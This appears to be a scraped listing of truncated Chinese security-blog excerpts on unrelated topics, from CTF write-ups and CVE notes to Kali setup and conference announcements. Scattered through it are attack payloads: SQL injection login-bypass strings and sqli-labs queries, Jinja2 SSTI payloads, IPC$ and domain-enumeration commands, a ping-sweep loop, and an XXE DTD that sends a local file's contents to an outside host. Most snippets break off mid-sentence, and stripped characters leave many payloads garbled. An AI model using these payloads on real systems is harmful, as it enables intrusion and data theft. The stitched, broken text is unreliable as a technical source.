IPC$入侵的4种方式
1. 建立空连接
net use \\192.168.1.111\IPC$只要在建立空连接的命令最后添加del,即删除IPC$空连接的命令
2. 查看远程主机的当前时间
net time \\192.168.1.1113. 查看远程主机的共享资源
net view \\192.168.1.1114. 得到远程主机的NetBIO…
0x00 前言
什么是客户端攻击
客户端攻击根据教程直译过来就是一种依靠应用程序使用控制端来进行的可视化攻击。
原文:A client-side attack is an attack against an application used to view attacker controlled content.
为什么要进行客户端攻击
随着时代发…
前言
当我们平时拿到云服务的访问凭证即 Access Key 时,通常的做法可能是看下对方的 OSS 对象存储、或者在实例上执行个命令,但 AK 的利用远不止这些,通过 AK 我们可以做太多太多的事情,为了方便 AK 的利用,于是有了这…
DNS
DNS(Domain Name Service):为客户机提供域名解析服务器
DNS服务器分类
主要名称服务器辅助名称服务器根名称服务器高速缓存名称服务器
域名组成
域名组成概述
主机名.域名称为完全限定域名(FQDN),一个域名下可以有多个主机,域名全球唯一&#…
An Event-based Data Model for Granular Information Flow Tracking
Abstract
我们提出了一个通用的数据模型(common data model CDM),用于跨各种平台和粒度表示因果事件。该模型是在美国国防高级研究计划局透明计算计划下为攻击起源分析而…
DNS 协议
1、了解域名结构 2、 DNS 查询过程 3、在 Windows server 上部署 DNS 4、分析流量 实施 DNS 欺骗 再分析
一、 DNS
1、概念
● DNS ( domain name system )域名系统,作为将域名的 IP 地址的相互映射关系存放在一个分布式的数据库࿰…
前言:本文需要注册一个xss平台,以接收xss反弹回来的数据,请自己在互联网上寻找合适的xss平台 1. 构造闭合语句
根据题目提示,判断网站存在DOM xss漏洞
查看页面源代码,发现关键位置,其中CTFHub is very n…
下面是记录了一些万能密码登录语句,一下均来自网络
数值型万能账号
a or true #
a or 1 #
a or 11 #
a or true – a
a or 1 – a
a or 11 – a
单引号字符型万能密码
a’ or true #
a’ or 1 #
a’ or 11 #
a’ or true --a
a’ or 1 – a
a’ or 11…
近日,腾讯安全入选了国际权威研究机构Forrester发布的《The Enterprise Fraud Management Landscape In Asia Pacific, Q1 2023》(2023年第一季度亚太地区企业欺诈管理报告)。报告通过营收表现、产品功能、垂直市场等维度调研了亚太地区24家供…
显示过滤器
语法
■比较操作符:( eq ) !( neq ) >大于( gt ) <小于( It ) >大于等于( ge ) <小于等于( le ) ■逻辑操作符: and (&&)与 or (||) 或 not …
1.查看是否为域环境 net config workstation下面命令能否执行成功和computer brower服务是否开启有关
net view /domain2.查询域内的用户和组 查询域内的所有用户
net user /domain查询域内的所有用户(需要在域控上敲)
dsquery user查询域内的某个用户
net user dbadmin /d…
Spring Messaging-远程命令执行漏洞(CVE-2018-1270)
0x00 前言
spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息࿰…
漏洞描述
MySQL是Oracle开源的关系型数据库管理系统。
MySQL Server 受影响版本存在拒绝服务漏洞,攻击者者无需身份验证可发送连接数据包导致MySQL Server 崩溃拒绝服务。官方未公布相关细节,可能由于对客户端设置字符集的处理不当,当客户端…
DCShadow
2018年1月24日,在BlueHat安全会议上,安全研究员Benjamin Delpy 和 Vincent Le Toux 公布了针对微软活动目录域的一种新型攻击技术------DCShaow。利用该攻击技术,具有域管理员权限或企业管理员权限的恶意攻击者可以创建恶意域控,然后利用域控间正常同步数据的功能…
OnlyForYou
OnlyForYou 是一台中等难度的 Linux 计算机,其特点是 Web 应用程序容易受到本地文件包含 (LFI) 的影响,该应用程序用于访问源代码,从而揭示盲目命令注入漏洞,从而导致目标系统上的 shell。该计…
权限提升:溢出漏洞 权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell …
网络安全:渗透神器 kali 的安装.
Kali Linux是一款基于Debian的Linux发行版,专门用于渗透测试和网络安全评估。它包含了大量的渗透测试工具和网络安全工具,适用于各种不同的渗透测试场景和需求。 目录:
网络安全:渗透…
Sandworm
Sandworm 是一台中等难度的 Linux 机器,它托管了一个具有“PGP”验证服务的 Web 应用程序,该服务容易受到服务器端模板注入 (SSTI) 的攻击,导致“Firejail”监狱内的远程代码执行 (RCE࿰…
IDE的概念
集成开发环境(IDE,Integrated Development Environment )是用于提供程序开发环境的应用程序,一般包括代码编辑器、编译器、调试器和图形用户界面等工具。集成了代码编写功能、分析功能、编译功能、调试功能等一体化的开…
边缘智能相关论文Fast InferenceModel CompressionReduction in CommunicationFederated Learning and OptimizationFederated Learning and security最近边缘计算方面出了很多新的研究成果,在AI背景下,边缘智能(Edge Intelligence࿰…
应急响应
What is
应急响应对应的英文是 Incident response或emergency responcse,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。
当企业发生黑客入侵、系统崩溃货其他影响业务正常运行的安全时间是,急需第一时间进行处理,使企业…
漏洞描述
Franklin Electric Franklin Fueling Systems是美国Franklin Electric公司的一个加油系统,Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件。
免责声明
技术文章仅供参考,任…
AWD(Attack With Defense,攻防兼备)是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取 Flag 分数时,别人会被扣分,同…
XXE(xml外部实体注入)
XML External Entity
XXE介绍
XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/readconvert.base64-encode/resourcefile:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM http://192.168.0.105:8080?p…
CTF是啥
CTF 是 Capture The Flag 的简称,中文咱们叫夺旗赛,其本意是西方的一种传统运动。在比赛上两军会互相争夺旗帜,当有一方的旗帜已被敌军夺取,就代表了那一方的战败。在信息安全领域的 CTF 是说,通过各种攻击手…
这里solr.cmd报错,报错原因是java版本问题,后面发现这是因为多个java版本导致读取java_home失败, 那么我们修改solr.cmd中的JAVA_HOME为SOLR_JAVA_HOME
IF DEFINED SOLR_JAVA_HOME set "JAVA_HOME%SOLR_JAVA_HOME%"环境变量将SOLR…
一、XSS简介
跨站脚本攻击XSS(Cross Site Scripting)。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行…
漏洞描述
docker环境搭建 使用 AXFR 协议的 DNS 区域传输是跨 DNS 服务器复制 DNS 记录的最简单机制。为了避免在多个 DNS 服务器上编辑信息,可以在一台服务器上编辑信息,并使用 AXFR 将信息复制到其他服务器。但是,如果您不保护您的服务器&…
题目很明确了就是伪协议
php://filter/convert.base64-encode/resourcehint.php 提交的伪协议的内容需要是 I want flag,就会echo flag 方法1:adata://text/plain,I want flag
方法2:adata://text/plain;base64,SSB3YW50IGZsYWc
Flask(Jinja2) 服务端模板注入漏洞(SSTI)
参考 https://www.freebuf.com/articles/web/260504.html 验证漏洞存在 ?name{{7*7}} 回显49说明漏洞存在
vulhub给出的payload:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__…
文章目录 预编译 CASE 注入1. SQL注入漏洞防御2. WEBGOAT SQL注入2.1 WebGoat 8.02.2 Order by 注入2.2.1 构造 when 的条件2.2.2 代码审计 预编译 CASE 注入
预编译 CASE(Prepared CASE)是一种数据库查询语言(如SQL)中的控制语句…
python练习(猜数字,99乘法表)
猜数字
import random
num1random.choice(range(1,101))for i in range(11):num2input("plz input a number:")num2int(num2)if num1<num2:print("太大了,小一点")elif num1>num2:print("…
文章信息
论文题目:An Invisible Flow Watermarking for Traffic Tracking: A Hidden Markov Model Approach 期刊(会议):ICC 2019 - 2019 IEEE International Conference on Communications (ICC) 时间:2019 级别&am…
堆叠注入
less-38 less-38 ?id1 and 11;%00 成功 ?id1 and 12;%00 失败 不是吧 这就出来了? ?id1 order by 4;%00 报错 4列不行 ?id0 union select 1,2,3;%00 显示位置为2,3 ?id0 union select 1,database(),3;%00 数据库为security ?id0 union select 1,…
简介
Web Fuzzer 序列就是将多个 Web Fuzzer 节点串联起来,实现更复杂的逻辑与功能。例如我们需要先进行登录,然后再进行其他操作,这时候我们就可以使用 Web Fuzzer 序列功能。或者是我们在一次渗透测试中需要好几个步骤才能验证是否有漏洞这…
选择题示例: 在网络安全中,什么是“DDoS”攻击的全称? a) Distributed Denial of Service b) Data Destruction of Service c) Direct Denial of Security d) Digital Defense of Servers 使用什么类型的加密可以确保在互联网上传输的数据是…
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现 漏洞名称影响版本影响版本 漏洞复现环境搭建漏洞利用漏洞利用 总结 漏洞名称
影响版本
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现…
第三届密码学、网络安全和通信技术国际会议(CNSCT 2024)
2024 3rd International Conference on Cryptography, Network Security and Communication Technology
随着互联网和网络应用的不断发展,网络安全在计算机科学中的地位越来越重要&…
第一次知道原来各种map也是申请的一段连续的内存空间来存储,所以必要的时候可以通过固定偏移来从一种map获取到另一种map。但是要注意这里的获取的时候要保证对象不被释放。
这也是做的第一道涉及优化器的题目,收货很多
class Memory{constructor(){th…
「NLP网安」相关顶级会议&期刊投稿注意事项 写在最前面一、会议ACL (The Annual Meeting of the Association for Computational Linguistics)IH&MMSec (The ACM Workshop on Information Hiding, Multimedia and Security)CCS (The ACM Conference on Computer and Co…
BUUCTF:https://buuoj.cn/challenges
题目描述: 得到的 flag 请包上 flag{} 提交。
密文: 下载附件得到一个.txt文本。 解题思路: 1、结合题目提示和文本特征,可以确定为Ook!编码。
Ook. Ook. Ook. Ook. Ook. Ook…
Bagel
今天我开始了《Red Team Development and Operations A Practical Guide》的学习,保持学习,后面差不多到时机后就学CRTOⅡ Bagel 是一款中等难度的 Linux 机器,其特点是电子商店容易受到路径遍历攻击,通过该攻击可以获取应…
【预备知识】
Administrator 原意为管理人或行政官员或遗产管理人,在计算机名词中,它的意思是系统超级管理员或超级用户。但是在Windows系统中此用户名只在安全模式中使用。
【实验步骤】
网络拓扑:server2008-basic windows server 2008
用户:administrator
密码:Ad…
目录 信息收集
1、arp
2、netdiscover
3、nmap
4、nikto
5、whatweb
目录探测
1、gobuster
2、dirsearch
WEB
wpscan
get username
get password
MSF get shell
提权
get root
get flag 信息收集
1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interf…
一、信息收集
信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集
1、nmap 扫描存活 IP
由于本项目环境是 nat 模式需要项目 IP 地址,扫描挖掘本地的 IP 地址信息: 本机 IP 为:192…
权限提升:网站后台 权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell …
永痕之黑
1. 永恒之黑漏洞相关信息
漏洞介绍 https://nvd.nist.gov/vuln/detail/CVE-2020-0796
漏洞影响版本: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Wi…
HTTP和HTTPS是互联网上最常见的两种协议之一。 HTTP(Hypertext Transfer Protocol)是用于在Web服务器和Web浏览器之间传输数据的标准协议。 HTTPS(Hypertext Transfer Protocol Secure)是一个安全的HTTP协议,使用SSL&a…
和上一题差不多,就是单引号变成了双引号
?id1" and sleep(5)--
查当前数据库名
?id1" and if(ascii(substr(database(),1,1))>0,sleep(3),1)--
查表名
?id1" and if(ascii(substr((select table_name from information_schema.tables whe…
OAI 环境搭建运行 ./config_container 时报如下图错误:
Error: The node does not have system_traces yet, probably still bootstrapping
Connection error: (Unable to connect to any servers, {192.168.61.2: error(111, "Tried connecting to [(192.16…
srsRAN 环境搭建:
文档上的一句话:装上之后找配置文件可以从这里找:
By default, all applications will search for confifig fifiles in the user’s home directory (~/.srs) upon startup.
实际的配置文件在下面的目录下: …
文章目录Dijkstra第五届浙江省大学生网络与信息安全竞赛-技能挑战赛Webnisc_easywebnisc_学校门户网站吃豆人吃豆魂买买买01REManyCheckMISC好怪哦Dijkstra
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛
Web
nisc_easyweb 打开是phpinfo(),没有flag…
一、Kali Linux 2 介绍与安装
1、Kali Linux 2 简介
Kali Linux 2是一个面向专业人士的渗透测试和安全审计的操作系统,它是由之前大名鼎鼎的Back Track系统发展而来。Back Track系统曾经是世界上非常优秀的渗透测试操作系统,取得了极大的成功。之后Off…
POST输入
uname1") order by 2#&passwd1&submitSubmit
这个地方很严格,")#都要,如果用--,报错都会有问题(弄的我以为要用单引号,弄了半天) 出现了回显点
查找数据库
uname1") …
过滤了request,之前的方法都不能用了,直接用终极代码
?name
{% set podict(poa,pa)|join%}
{% set a(()|select|string|list)|attr(po)(24)%}
{% set ini(a,a,dict(inita)|join,a,a)|join()%}
{% set glo(a,a,dict(globalsa)|join,a,a)|join()%}
{% se…
页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。
是要GET一个参数name,这个不好想到 顺便确定有SSTI漏洞 <加字母就会被过滤
Smarty中的方法也不能用了
获取eval函数并执行任意python代码的POC
{% for c in []…
Less-18
查数据库
1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) and 1 and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) and 查表名
1 and updatexml(1,concat(0x7e,(select group_concat(t…
本文主要参考的是Zhauniarovich Y, et al[1]的工作,发表在Acm Computer Surveys上的一篇较为系统地阐述了基于DNS数据分析来进行恶意域名检测的研究背景,研究过程和研究建议等内容的综述。目录1 研究背景1.1 DNS的背景知识1.1.1 DNS是什么1.1.2 域名的结…
Header space analysis: Static checking for networks IntroductionThe Geometric ModelModeling Networking BoxesHeader Space AlgebraSet Operations on H \mathcal{H} HDomain, Range and Range Inverse</
只能用cookie传参,如果用POST传参,就会提示用cookie,无论cookie中输入什么都是这样 uname1#
uname1 order by 3#
uname1 order by 2#
都不会有任何回显,但是4就会报错,也只会报错 但是select的时候又直接回显了&…
User Name必须要是admin其他的都不行,看题目界面知道是更新密码的题,和之前的都有些不一样(所以按理说应该也是正确了不会有回显,错误了会有显示,所以应该用报错注入) 格式变成了这样
unameadmin&pass…
题目 拓扑图 IP地址及环回配置
注:R2的g0/0/1口和g0/0/2口还有R4的g0/0/0口和g0/0/2口都先不配置IP,因为后面这些接口的IP需要放入vpn空间中
R1
<Huawei>sys
Enter system view, return user view with CtrlZ.
[Huawei]sysname r1
[r1]int l0
[…
前言
单单以下列命令运行虽然是root,还不行,我们需要加--privileged,不然会报
hostname: you must be root to change the host name
docker run -it --utshost ubuntu:latest /bin/bash
如果加上--privileged后
docker run -it --priv…
MySQL MOF提权
MOF介绍
mof是windows系统的一个“托管对象格式”文件(位置:C:/windows/system32/wbem/mof/),其作用是每隔五秒就会去监控进程创建和死亡,mof目录下有两个文件夹(good与bad)。Windows server 2003及以下系统每5秒会执行一次mof目录下的文件,执行成功会…
一,什么是XSS漏洞? XSS全称(Cross Site Scripting)跨站脚本攻击,为了避免和CSS层叠样式表名称冲突,所以改为了XSS,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年…
什么是XSS
跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击,攻击者可以在合法网站或Web应用程序中执行恶意脚本。当wb应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS。 跨站脚本攻击,XSS(Cross Site S…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
文章目录 深信服应用交付 AD 存在远程命令执行漏洞 附POC1. 深信服应用交付 AD 简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾 深信服应用交付 AD 存在远程命令执行漏洞 附POC
免责声明:请勿利用文章内的相关技术从事非法测…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
【漏洞概述】
金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。
【漏洞介绍】
金蝶 EAS 及 EAS Cloud 存在远程代码执行漏洞
【影响版本】
金蝶 EAS 8.0,8.1,8.2…
题目环境: FLAG NEED YOUR 100000000 MONEY flag需要你的100000000元 F12瞅瞅源代码:
if (isset($_POST[password])){
$password $_POST[password];
if (is_numeric($password))
{
echo "password cant be number"
}
elseif ($pas…
mitreattack-python是用来处理ATT&CK数据的python开源工具。 开源地址:GitHub - mitre-attack/mitreattack-python: A python module for working with ATT&CK 安装
pip3 install mitreattack-python #使用清华源pip3 install mitreattack-python -i http…
随着人工智能技术的发展,安全行业大模型SecLLM(security Large Language Model)应运而生,可应用于代码漏洞挖掘、安全智能问答、多源情报整合、勒索情报挖掘、安全评估、安全事件研判等场景。
参考:
1、安全行业大模…
「NLP网安」相关顶级会议&期刊投稿注意事项 写在最前面一、会议ACL (The Annual Meeting of the Association for Computational Linguistics)IH&MMSec (The ACM Workshop on Information Hiding, Multimedia and Security)CCS (The ACM Conference on Computer and Co…
Blender 发布公告指出,在2023年11月18日至23日期间,blender.org 网站遭受了持续的分布式拒绝服务(DDoS)攻击,攻击者通过不断发送请求导致服务器超载,使网站运营严重中断。此次攻击涉及数百个 IP 地址的僵尸…
漏洞描述
官方文档这样描述:OpenTSDB is a distributed, scalable Time Series Database (TSDB) written ontop of HBase;
翻译过来就是,基于Hbase的分布式的,可伸缩的时间序列数据库。
主要用途,就是做监控系统;譬如收集大规模集群(包括网络设备、操作系统、应用程序…
接着来看第4个函数,int replaceByte(int x, int n, int c),看题目给出的例子,replaceByte(0x12345678,1,0xab) 0x1234ab78。我们可以多写几个例子,进而找出规律,比如:
replaceByte(0x12345678,2,0xab) 0…
文章目录 初赛so large e 决赛JIGE 初赛
so large e
题目:
from Crypto.Util.number import *
from Crypto.PublicKey import RSA
from flag import flag
import randomm bytes_to_long(flag)p getPrime(512)
q getPrime(512)
n p*q
e random.getrandbits(1…
点我完整下载:基于信息隐藏技术的安全电子邮件设计与开发 基于信息隐藏技术的安全电子邮件设计与开发 "Design and Development of Secure Email System using Information Hiding Techniques" 目录 目录 2 摘要 3 关键词 4 第一章 前言 4 1.1 研究背景 4…
Linux横向移动
主机存活探测
shell
for i in 192.168.111.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
或者
for k in $( seq 1 255);do ping -c 1 192.168.1.$k|grep "ttl"|awk -F "[ :]" {print $4}; d…
BroScience
BroScience 是一款中等难度的 Linux 机器,其特点是 Web 应用程序容易受到“LFI”的攻击。通过读取目标上的任意文件的能力,攻击者可以深入了解帐户激活码的生成方式,从而能够创建一组可能有效的令牌来激活新创建的帐户。登录后&a…
文章目录 网络拓扑添加策略ESP添加筛选器添加筛选器的操作另一台主机设置 AH 使用Windows Server 2003系统 网络拓扑
client1 IP 192.168.17.105client2 IP 192.168.17.106 只要保证两个主机在同一网段接口,即互相ping通即可完成策略的实现 下面的所有通讯都只是…
Less-49(GET - Error based - String Bind - ORDER BY CLAUSE)
手工注入 无回显(还是单引号闭合),只能使用延时注入 自动脚本
和上一关一样
Less-50(GET - Error based - ORDER BY CLAUSE -numeric- Stacked injection)
手工注入 这里需要使用堆叠注入的思路 自…
有效防御Cc、API接口、http、tcp、WEB应用扫描/爬虫、SYN、WAF、DDOS、UDP、入侵、渗透、SQL注入、XXS跨站脚本攻击、远程恶意代码执行、session ion fixation、Webshell攻击、恶意请求,恶意扫描、暴击破解、CSRF等各种攻击。不用迁移数据,服务器用哪里…
Linux Labs 根据题目给出的内容,在kali中连接靶机,输入密码进入命令行模式 ls发现什么都没有,有可能进入到了一个空文件夹 cd .. 切换到上一层目录,ls查看此目录下的内容,发现flag.txt文件,查看文件是flag …
1、eaaeval
查看源码能看见账号:username169,密码:password196提交这个用户密码可以跳转到页面/dhwiaoubfeuobgeobg.php
通过dirsearch目录爆破可以得到www.zip
<?php
class Flag{public $a;public $b;public function __construct(){…
服务器解析漏洞(Server-side Include Vulnerability,SSI漏洞)是一种安全漏洞,通常出现在支持服务器端包含(SSI)功能的Web服务器上。SSI是一种在Web页面中嵌入动态内容的技术,允许开发人员将外部…
题目环境: 题目难度:★★ 题目描述:Q的系统会不会有漏洞? 看到了登录窗口,使用burp suite工具进行抓包 burp suite抓包 admin 1 Repeater重放Send放包 Your IP is not the administrator’s IP address! 您的IP不是管理…
[LitCTF 2023]Follow me and hack me wp
GET & POST 传参
这里用 HackBar ,GET 传参 CTFLit2023 ,POST 传参 Challengeim_c0m1ng ,拿到 flag : 提示说备份文件还有好吃的,那么我们就来获取一下备份文件。
获取备…
Empire:Breakout
January 11, 2024 11:54 AM Tags:brainfuck编码;tar解压变更目录权限;Webmin;Usermin Owner:只惠摸鱼
信息收集 使用arp-scan和namp扫描C段存活主机,探测靶机ip:1…
在前面,我们已经下载并安装了Kali Linux 2023版本,因为一些事情的耽误,后面的一些操作教程没有发出来,今天给大家补上。
Kali Linux安装
前置准备:
VMware安装kali Linux 镜像下载
kali源
官方源
deb http://htt…
随着国产化替代步伐加速,以及企业出于信息安全建设的需要,越来越多的企业和组织开始考虑将现有的微软 Active Directory(AD)替换为国产化的LDAP身份目录服务(也称统一身份认证和管理)系统。本文将介绍一种国…
一、介绍
"Google语法"通常是指在 Google 搜索引擎中使用一系列特定的搜索语法和操作符来精确地定义搜索查询。这些语法和操作符允许用户过滤和调整搜索结果,提高搜索的准确性。
二、安装 Google
下载 Google 浏览器
Google 官网https://www.google.c…
先试了一下弱口令,哈哈习惯了 查看页面源码发现xml
function doLogin(){var username $("#username").val();var password $("#password").val();if(username "" || password ""){alert("Please enter the usern…
一、DNS历史解析记录 DNS 历史解析记录指的是一个域名在过去的某个时间点上的DNS解析信息记录。这些记录包含了该域名过去使用的IP地址、MX记录(邮件服务器)、CNAME记录(别名记录)等 DNS 信息。DNS 历史记录对于网络管理员、安全研…
Less-51(GET - Error based - ORDER BY CLAUSE-String- Stacked injection)
手工注入
源码 单引号闭合用注释(没有后续输出只能堆叠注入) 自动注入
和上一关一样
Less-52(GET - Bind based - ORDER BY CLAUSE-numeric- Stacked injection)
手工注入 数字类型 不用注释直接…
靶场链接:https://pan.baidu.com/s/1ors60QJujcmIZPf3iU3SmA?pwd4mg4 提取码:4mg4
XSS漏洞原理
XSS又叫CSS(Cross Site Script),跨站脚本攻击。因为与html中的css样式同,所以称之为XSS。在OWASP top 1…
DCRS工作任务
DCRS 开启 telnet 登录功能,用户名 dcn01,密码 dcn01,配置使 用 telnet 方式登录终端界面前显示如下授权信息: “WARNING!!! Authorised access only, all of your done will be recorded! Disconnected IMMEDIATEL…
---------【WEEK-2】---------
What the cow say?
题目描述:the cow want to tell you something
注意title,Python的flask漏洞可多呢 版本310 先测一下SSTI
正常情况下 SSTI测试 变量渲染测试,被waf了,说明方向对了 单单过滤…
CVE-2023-41892
开题,是一个RCE Thanks for installing Craft CMS!
You’re looking at the index.twig template file located in your templates/ folder. Once you’re ready to start building out your site’s front end, you can replace this with someth…
linux web到rootlinux 本地到root:关于linux提权一般来说在webshell能运行的,到本地提权应该也可以运行,只要有一定的权限,一些方法在webshell上也可以运行,只是总结了一些常见的提权方法一般来说,我自己认为提权思考的…
1.整型注入
页面正常时 判断注入字段数
?id1 order by 2判断注入回显位
?id-1 union select 1,2查数据库
?id-1 union select 1,database()库名:sqli 查数据表
?id-1 union select 1,group_concat(table_name) from information_schema.tables where tabl…
权限提升:烂土豆 || DLL 劫持.
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通…
从事网络安全工作,手上自然离不开一些重要的网络安全工具。今天,分享10大网络安全工具。
一、Kali Linux Kali 是一个基于 Debian 的 Linux 发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这…
文章目录 一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、自学网络安全学习路线一、Windows操作系统1、Windows操作系统简介2、Windows 95/98/ME安全体系结构:3、 Windows NT/2000/XP的安全基础:4、 Windows 2000安全基础概念5、 W…
Kali Linux安装中国蚁剑(AntSword)
下载地址:https://github.com/AntSwordProject/下载Linux64位的AntSword-Loader进入解压目录后,给执行权限:chmod ux AntSword进行安装前要创建空目录,最好是/usr/local…
东西很多,能操作的只有BUY IT NOW 和输入授权码这里 说要付款,我还真就扫了一下 又试了下对授权码输入一些代码,也没用
再重新看一遍源代码,才发现有东西,之前只注意了开头和结尾 function enc(code){hash hex_md5(…
?inject1 order by 2-- 过滤了很多关键词,就有select,好像绕不过
试试报错注入
?inject1 and extractvalue(1,concat(0x7e,(database()),0x7e))--
数据库:surpersqli 因为过滤了太多,报错注入不了,只能试试别的了…
文件夹或文本操作
1、显示当前工作路径
pwd2、返回上一级目录
cd ..3、进去当前用户主目录
cd ~4、创建文件
touch test.txt5、创建文件夹
mkdir test6、显示文件和文件夹名
ls 显示文件和文件夹名
ls -a 显示所有的文件和文件夹 包含隐藏文件
ls -l 显示文件和目录的详…
一、配置说明
GNS3版本:2.2.40.1 二、创建拓扑图 图中包含一台msf攻击机,一台带有漏洞的靶机,二者用交换机连接。在最上面有一个路由器。
配置msf机器和靶机为dbcp 将dhcp相关内容放开(去掉#注释)。
#
# This is a …
1、简介
UPnP是通用即插即用(Universal Plug and Play)的缩写,主要用于设备的智能互联互通,使用UPnP协议不需要设备驱动程序,它可以运行在目前几乎所有的操作系统平台上,使得在办公室、家庭和其他公共场所…
前言
T Wiki 在 4 月 16 日上线,5 月份以来依然收到不少师傅的支持与反馈,此时正好到月末,特此整理下这段时间来 T Wiki 上所更新的内容,如果你还不知道 T Wiki 是什么,可以查看这篇文章T Wiki 云安全知识文库上线&am…
安装kali
下载kali作为虚拟环境,
Get Kali | Kali Linux 通过vmvare打开,默认账号密码kali/kali
修改root密码 su passwd root 如果一些配置普通用户做不了就切换kali,或sudo 命令
kali配置
apt换源 echo > /etc/apt/sources.list
v…
文章目录 CCS-2023NDSS-2024S&P-2024Usenix Security-2024 CCS-2023
The 30th ACM Conference on Computer and Communications Security (CCS) seeks submissions presenting novel contributions related to all real-world aspects of computer security and privacy. …
Positive Technologies 专家帮助修复 Western Digital 网络存储设备中的一个危险漏洞
经过验证的攻击者可利用该漏洞在受攻击的设备上注入恶意软件并远程访问文件
Western Digital 感谢 Positive Technologies 专家 Nikita Abramov 发现 Western Digital NAS 固件中的一个漏洞…
文章目录 1、失效的访问控制1.1、OWASP Top 101.1.1、A5:2017-Broken Access Control1.1.2、A01:2021 – Broken Access Control 1.2、失效的访问控制类别1.2.1、水平越权1.2.2、垂直越权 1.3、攻防案例1.3.1、Pikachu靶场 Over Permision1.3.2、DVWA越权利用失效的访问控制漏洞…
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
0x00 前言
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问…
文章目录 October 2019 Twice SQL Injection[GYCTF2020]EasyThinking[BJDCTF2020]EzPHP[HFCTF2020]JustEscape(vm2沙箱逃逸)[GXYCTF2019]StrongestMind[GKCTF 2021]easycms[SUCTF 2018]GetShell[b01lers2020]Life on Mars[WMCTF2020]Make PHP Great Again[MRCTF2020]Ezaudit[CS…
什么是 Permissions Policy(权限策略)?
Permissions Policy 为 web 开发人员提供了明确声明哪些功能可以在网站上使用,哪些功能不能在网站上使用的机制。可以设置一组策略,用于限制站点代码可以访问的 API 或者修改浏…
SQL Server 数据库安装
SQL Server介绍
SQL Server 是Microsoft 公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点,可跨越从运行Microsoft Windows 98 的膝上型电脑到运行Microsoft Windows 2012 的大型多处理器的服务器等多种平台使用。…
忘了发了,来迟了 顺便发一下战队的全wp: https://wp.n03tack.top/posts/4906/
Misc
应该算是签到
来得早不如来的巧 CyzCC_loves_LOL
小脑洞老考点,理解一下 其实是放进百度翻译然后一下看出来了
s D0g3isthepAssword
flag
for i in …
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
题目 利用代码跑一下解码
import gmpy2
e 17
p 473398607161
q 4511491
d gmpy2.invert(e,(p-1)*(q-1))
print(d)总结
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。它基于两个大素数的乘积难以分解的数…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
Go download the app:
小皮面板(phpstudy) - 让天下没有难配的服务器环境! (xp.cn)
